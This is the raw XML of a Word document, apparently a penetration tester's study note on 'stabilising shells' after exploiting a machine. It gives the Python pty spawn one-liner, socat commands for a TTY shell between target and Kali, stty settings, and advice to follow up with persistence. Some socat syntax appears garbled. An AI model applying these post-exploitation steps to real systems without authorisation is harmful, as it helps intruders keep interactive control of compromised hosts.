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F51C" w14:textId="0A8BF27B" w:rsidR="002D7B03" w:rsidRDefault="00E75EA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75EA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Stabilising Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E210F5" w14:textId="3CB14A4A" w:rsidR="00E75EA4" w:rsidRDefault="00E75EA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787BD711" w14:textId="6C337ACD" w:rsidR="00E75EA4" w:rsidRDefault="00E75EA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Is the exploit stable?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2911343A" w14:textId="04651A3E" w:rsidR="00E75EA4" w:rsidRPr="00C5442F" w:rsidRDefault="00E75EA4" w:rsidP="00E75EA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5442F">
        <w:t>Does it crash the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC6BF4" w14:textId="11C35184" w:rsidR="00E75EA4" w:rsidRPr="00C5442F" w:rsidRDefault="00E75EA4" w:rsidP="00E75EA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5442F">
        <w:t>Does it run properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AEB21" w14:textId="0D335CCC" w:rsidR="00E75EA4" w:rsidRPr="00C5442F" w:rsidRDefault="00E75EA4" w:rsidP="00E75EA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5442F">
        <w:t>Is the shell stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067BAF44" w14:textId="10270CEA" w:rsidR="00E75EA4" w:rsidRPr="00C5442F" w:rsidRDefault="00E75EA4" w:rsidP="00E75EA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5442F">
        <w:t>Is the exploit a one-pump-run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE9B33" w14:textId="2BA381C6" w:rsidR="00C5442F" w:rsidRDefault="00C5442F" w:rsidP="00C5442F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5442F">
        <w:t>OEM process killers (taking too much memory up, or process running times etc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB66431" w14:textId="4536FCDA" w:rsidR="00C5442F" w:rsidRDefault="00C5442F" w:rsidP="00C5442F"/>
    <w:p w14:paraId="698F165A" w14:textId="254B3797" w:rsidR="00C5442F" w:rsidRDefault="00C5442F" w:rsidP="00C5442F">
      <w:r w:rsidRPr="00C5442F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C5442F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a pseudo terminal that can trick root actions that there is a real terminal in place when there’s not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6F499" w14:textId="0033FA73" w:rsidR="00C5442F" w:rsidRDefault="00C5442F" w:rsidP="00C5442F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vi, sudo, su </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651BCC7E" w14:textId="6FA461FF" w:rsidR="00C5442F" w:rsidRDefault="00C5442F" w:rsidP="00C5442F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python -c ‘import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050733E" w14:textId="05363372" w:rsidR="00C5442F" w:rsidRDefault="00C5442F" w:rsidP="00C5442F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Will be able to execute commands now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B604BB3" w14:textId="4E0E0CDC" w:rsidR="00277BA0" w:rsidRDefault="00277BA0" w:rsidP="00277BA0"/>
    <w:p w14:paraId="333B21F8" w14:textId="77777777" w:rsidR="00277BA0" w:rsidRPr="004E10EB" w:rsidRDefault="00277BA0" w:rsidP="00277BA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E10EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BB09681" w14:textId="2E46192F" w:rsidR="00277BA0" w:rsidRDefault="00277BA0" w:rsidP="00277BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raw,echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0 tcp-listen:4444 (on target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B58A3A" w14:textId="3E781724" w:rsidR="00277BA0" w:rsidRDefault="00277BA0" w:rsidP="00277BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exec:’bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -li’,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty.stderr.setsid,sigint,sane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp:localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (on kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C9187" w14:textId="2C20EB55" w:rsidR="006367BB" w:rsidRDefault="006367BB" w:rsidP="006367BB"/>
    <w:p w14:paraId="05F0D98C" w14:textId="5D8D6A33" w:rsidR="006367BB" w:rsidRDefault="006367BB" w:rsidP="006367BB">
      <w:r w:rsidRPr="009D0EF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating interactive shell from sc</w:t>
      </w:r>
      <w:r w:rsidR="009D0EF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0EF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atch</w:t>
      </w:r>
      <w:r w:rsidR="009D0EF3">
        <w:t xml:space="preserve"> with just the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D0EF3">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D0EF3">
        <w:t xml:space="preserve"> console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D9038" w14:textId="1409C7F4" w:rsidR="006367BB" w:rsidRDefault="006367BB" w:rsidP="006367BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Id [set IDs]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564899E8" w14:textId="1AB4038D" w:rsidR="006367BB" w:rsidRDefault="006367BB" w:rsidP="006367BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=0(root) gid=0(root) </w:t>
      </w:r>
      <w:r w:rsidR="009D0EF3">
        <w:t>groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8E722" w14:textId="42C6EB1F" w:rsidR="009D0EF3" w:rsidRDefault="009D0EF3" w:rsidP="006367BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Export SHELL=bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6436CC57" w14:textId="1F16970A" w:rsidR="009D0EF3" w:rsidRDefault="009D0EF3" w:rsidP="006367BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Export TERM=xterm-256color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD2B8E" w14:textId="3F15A93D" w:rsidR="009D0EF3" w:rsidRDefault="009D0EF3" w:rsidP="006367BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rows 27 columns 81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A63AD" w14:textId="338F6702" w:rsidR="009D0EF3" w:rsidRDefault="009D0EF3" w:rsidP="009D0EF3">
      <w:r>
        <w:t>Interactive shell is now running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F85E1" w14:textId="146FCD87" w:rsidR="007837E6" w:rsidRDefault="007837E6" w:rsidP="009D0EF3"/>
    <w:p w14:paraId="4D90B094" w14:textId="6B647561" w:rsidR="007837E6" w:rsidRPr="00C5442F" w:rsidRDefault="007837E6" w:rsidP="009D0EF3">
      <w:r>
        <w:t xml:space="preserve">Once a machine is exploited, make sure you have a stable interactive shell first, then an make sure there’s an active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session available to you, then follow up with persistence </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007837E6" w:rsidRPr="00C5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05E4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33140B58"/>
    <w:lvl w:ilvl="0" w:tplc="E2E2A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64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A4"/>
    <w:rsid w:val="00277BA0"/>
    <w:rsid w:val="002D7B03"/>
    <w:rsid w:val="004B7BBD"/>
    <w:rsid w:val="004E10EB"/>
    <w:rsid w:val="005F405A"/>
    <w:rsid w:val="006367BB"/>
    <w:rsid w:val="007837E6"/>
    <w:rsid w:val="009D0EF3"/>
    <w:rsid w:val="00C5442F"/>
    <w:rsid w:val="00E7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A5A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82B281B8-4235-4C06-827C-20E10E58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2023-02-06T12:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-06T14:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>